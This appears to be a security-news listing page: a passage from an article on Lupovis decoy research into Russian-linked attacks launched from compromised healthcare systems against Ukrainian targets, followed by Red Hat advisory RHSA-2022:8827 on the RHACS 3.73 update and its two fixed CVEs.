The largest group of attackers were independent actors, says Xavier Bellekens, CEO of Lupovis. They often appeared to be acting alone and were part of communities on Telegram, he says. "Some actors were more advanced in their techniques, tactics, and procedures. However, we haven’t yet been able to correlate them against known Russian APTs." 

The primary motivations in many of these attacks appeared to be information stealing, disruption, and using the decoy websites to launch attacks against other Ukrainian targets, he notes.

**Going After Healthcare**

One of the most disconcerting aspects that researchers at Lupovis observed was the number of attacks on its decoys from other, previously compromised websites and systems belonging to healthcare organizations and entities in other industry sectors, from multiple countries. 

Bellekens says Lupovis was unable to identify the specific groups that were carrying out these attacks, or if any of them were previously known Russian advanced persistent threat groups. "We identified them as Russian if they used scripts containing Cyrillic, tried to access Russian websites, \[or\] looked for specific information in Cyrillic," he says. "A large number of these adversaries tried to exploit the decoys further to launch attacks against Ukrainian entities."

Lupovis' findings suggests that fears earlier this year about Russian cyberattacks in Ukraine impacting organizations in other countries were correct. "Russian cyberattacks have skyrocketed and any country or business that has allied with Ukraine, or opposed the war, has become a target," according to the report.

Concerns over such attacks prompted the US Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory earlier this year urging both government and private organizations to assume a Shields Up posture for detecting and responding to attacks from Russian cyber groups. The advisory followed remarks by President Joe Biden regarding the US government's willingness to respond in kind to any attempt by Russia to attack the US in cyberspace or through other asymmetric means.

Russian Actors Use Compromised Healthcare Networks Against Ukrainian Orgs

Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-24778: imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path
* CVE-2022-36056: app-containers/cosign: false positive verification


Issued:

2022-12-06

Updated:

2022-12-06

**RHSA-2022:8827 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Low: RHACS 3.73 enhancement and security update

**Type/Severity**

Security Advisory: Low

**Topic**

Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.  

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Release of RHACS 3.73 provides these changes:  

New features:  

*   Red Hat Advanced Cluster Security Cloud Service (ACSCS) is a Red Hat managed service that simplifies and accelerates RHACS deployments. ACSCS is available as a Field Trial release. For more information about accessing ACSCS, contact Red Hat Sales.
*   Improved Vulnerability Management dashboard for ACSCS users.
*   PostgreSQL database option is available as Technology Preview feature. If you are interested in participating in the Tech Preview program, contact your Red Hat account representative.
*   A new build-time network policy generator as Technology Preview feature, to generate Kubernetes network policies based on Application YAML manifests.

Notable technical changes:  

*   RHACS uses GraphQL internally to show data in the RHACS portal. However, Red Hat does not support querying RHACS using GraphQL. If you are using GraphQL, see https://access.redhat.com/articles/6986289 and contact Red Hat Consulting.
*   Sensor no longer uses \`anyuid\` Security Context Constraint (SCC). Instead, the default SCC for Sensor is now \`restricted\[-v2\]\` or \`stackrox-sensor\`, depending on the settings. In addition, the \`runAsUser\` and \`fsGroup\` for the Admission control and Sensor deployments are no longer hard-coded to \`4000\` on OpenShift clusters to allow using the \`restricted\` and \`restricted-v2\` SCCs. (ROX-9342)
*   The service account \`central\`, which the Central deployment uses, now includes \`get\` and \`list\` access to the pods, events, and namespaces resources in the namespace where you deploy Central.
*   The CSV export API \`/api/vm/export/csv\` now requires the \`CVE Type\` filter as part of the input query parameter. Supported values for \`CVE Type\` are \`IMAGE\_CVE\`, \`K8S\_CVE\`, \`ISTIO\_CVE\`, \`NODE\_CVE\`, and \`OPENSHIFT\_CVE\`.

Notice of in-product docs removal:  

*   Beginning in the RHACS 3.74 release, Red Hat will remove the in-product docs accessible from the help menu. If you are using the in-product docs, you can instead download the required documentation in PDF format from Red Hat Customer Portal. (ROX-12839)

Bug fixes:  

*   Previously, if you were using StackRox Kubernetes Security Platform - Splunk Technology Add-on, results for the \`ocp4-cis-node\` compliance standard was missing from Splunk. This issue is now fixed. The Splunk integration now includes the \`ocp4-cis-node\` compliance standard results. (ROX-11937)
*   Previously, Central would fail on the v1 CronJob deployment check. This issue is fixed. (ROX-13500)

Security Fix(es):  

*   imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path (CVE-2022-24778)
*   app-containers/cosign: false positive verification (CVE-2022-36056)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

To take advantage of the new features, bug fixes, and enhancements in RHACS 3.73 you are advised to upgrade to RHACS 3.73.0.

**Affected Products**

*   Red Hat Advanced Cluster Security for Kubernetes 3 x86\_64

**Fixes**

*   BZ - 2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path
*   BZ - 2128820 - CVE-2022-36056 app-containers/cosign: false positive verification
*   ROX-13687 - Release RHACS 3.73.0

**References**

*   https://access.redhat.com/security/updates/classification/#low
*   https://docs.openshift.com/acs/3.73/release\_notes/373-release-notes.html

**Red Hat Advanced Cluster Security for Kubernetes 3**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#sql